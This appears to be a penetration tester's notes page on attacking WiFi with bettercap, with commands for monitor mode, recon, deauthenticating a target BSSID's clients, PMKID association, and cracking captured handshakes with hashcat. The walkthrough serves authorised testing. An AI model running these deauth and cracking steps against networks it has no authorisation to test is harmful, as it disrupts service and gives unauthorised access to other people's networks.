# bettercap [bettercap](https://www.bettercap.org/) is "The Swiss Army knife for WiFi, Bluetooth Low Energy, wireless HID hijacking, CAN-bus and IPv4 and IPv6 networks reconnaissance and MITM attacks." :::warning Totally underconstruction while I review bettercap's CLI and see what's still relevant. ::: ## Connect USB wifi to ESXi/Proxmox In ESXI, shut down the host, then add a new USB device and choose "Realtek 802.11n NIC" ## Kill processes on the Kali VM that might screw stuff up: Install aircrackng ``` sudo apt install aircrack-ng -y ``` Kill services that might conflict with wifi shenanigans ``` sudo airmon-ng check kill ``` ## Start monitoring on the wifi card Enumerate your wifi interface ``` iwconfig ``` Using the name of your wifi interface, start it in monitoring mode ``` sudo airmon-ng start wlan0 ``` Check what your new monitoring interface is ``` iwconfig ``` *You'll likely see `wlan0mon` or something similar* ## Install via Go (Ubuntu 24.04) ``` sudo apt update sudo apt install -y pkg-config libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev -y sudo apt install golang-go -y go install github.com/bettercap/bettercap@latest ``` ## Install/run using Docker ``` sudo docker run -it --privileged --net=host bettercap/bettercap -iface wlan0 ``` ## Set wifi capture file (warning: if you don't set this now and want to change it, you have to RESTART the wifi recon function) ``` set wifi.handshakes.file /root/captures.pcap ``` ## Set wifi.deauth acquired to true (optional) What I found during testing is that I would capture a lot of "half" handshakes but never the full ones. After reading this Github [issue] (https://github.com/bettercap/bettercap/issues/889) I tried setting "set wifi.deauth.acquired true" and then I started getting full handshakes! ``` set wifi.deauth.acquired true ``` ## Get wifi recon going! ``` wifi.recon on ``` ### Troubleshooting tip :::tip I've run into some issues getting the `wifi.recon on` command to execute - due to some issues calling the `iw` executable. But I don't know that that's the actual issue. Reading further, I'm having problems like [this GitHub issue mentions](https://github.com/bettercap/bettercap/issues/614) where I try to put Bettercap into recon mode and it complains of `[17:58:47] [sys.log] [war] wifi could not set interface wlan0 txpower to 30, 'Set Tx Power' requests not supported`. So I followed a recommendation in that article to install [this driver](https://github.com/aircrack-ng/rtl8812au) like this: ``` sudo apt-get install dkms -y cd ~/ git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git cd rtl sudo make dkms_install make && make install ``` ::: ## Sort networks by # of clients connected ``` set wifi.show.sort clients desc ``` ## Every second, clear out our view and then present an updated list of nearby WiFi networks: ``` set ticker.commands 'clear; wifi.show' ``` ## Filter out client probes ``` events.ignore wifi.client.probe ``` ## Filter out client disconnections ``` events.ignore wifi.client.lost ``` ## Filter out new APs that come online ``` events.ignore wifi.ap.new ``` ## Filter out new clients that come online ``` events.ignore wifi.client.new ``` ## Filter out lost connections with APs ``` events.ignore wifi.ap.lost ``` ## Show networks that ONLY start with 7MS: ``` set wifi.show.filter ^7MS ``` ## Turn on ticker ``` ticker on ``` ## Set channel to the one you're attacking ``` wifi.recon.channel X ``` ## Disassociate all clients on a given BSSID to capture handshakes! ``` wifi.deauth 11:22:33:44:55:66 ``` ## Assoc with target SSID to do the PKMID attack ``` wifi.assoc all ``` -or- ``` wifi.assoc 11:22:33:44:55:66 ``` ## Clear SSID filter ``` set wifi.show.filter ^ ``` ## Clear wifi.recon.channel filter ``` wifi.recon.channel clear ``` ## Figure out the container ID for bettercap ``` sudo docker ps ``` # Copy files from docker to hard drive First, make note of the ID (noted with "XXX" below). If you didn't change the default path, you should be able to see captured files in the /root folder. Try listing them with: ``` sudo docker exec XXX ls /root/ ``` Now you can copy them out of the docker and into your current folder: ``` sudo docker cp XXX:/root/captures.pcap . ``` ## Convert .pcap files to hccapx files ``` sudo /usr/lib/hashcat-utils/cap2hccapx.bin wifi-handshakes.pcap wifi-handshakes-converted.hccapx ``` ## Crack w/hashcat! ``` sudo /path/to/hashcat -m2500 converted-file.hccapx wordlist.txt ``` If this doesn't work ^^^, it looks like the new standard hash type might be m22000 per [this article](https://hashcat.net/forum/thread-10253.html). In that case, here's what I did on the pcap itself to get it ready for hashcat: ``` sudo /usr/bin/hcxpcapngtool -o readytocrack.hc22000 wifi-handshakes.pcap ``` One time I had problems with my .cap file from bettercap and had to do this to clean it up: ``` tshark -r my-cap-file-from-bettercap.cap -R "(wlan.fc.type_subtype == 0x00 || wlan.fc.type_subtype == 0x02 || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x05 || wlan.fc.type_subtype == 0x08 || eapol)" -2 -F pcapng -w stripped.pcapng ``` Then convert from `.pcapng` to `.pcap` ``` editcap -F pcap stripped.pcapng stripped.pcap ```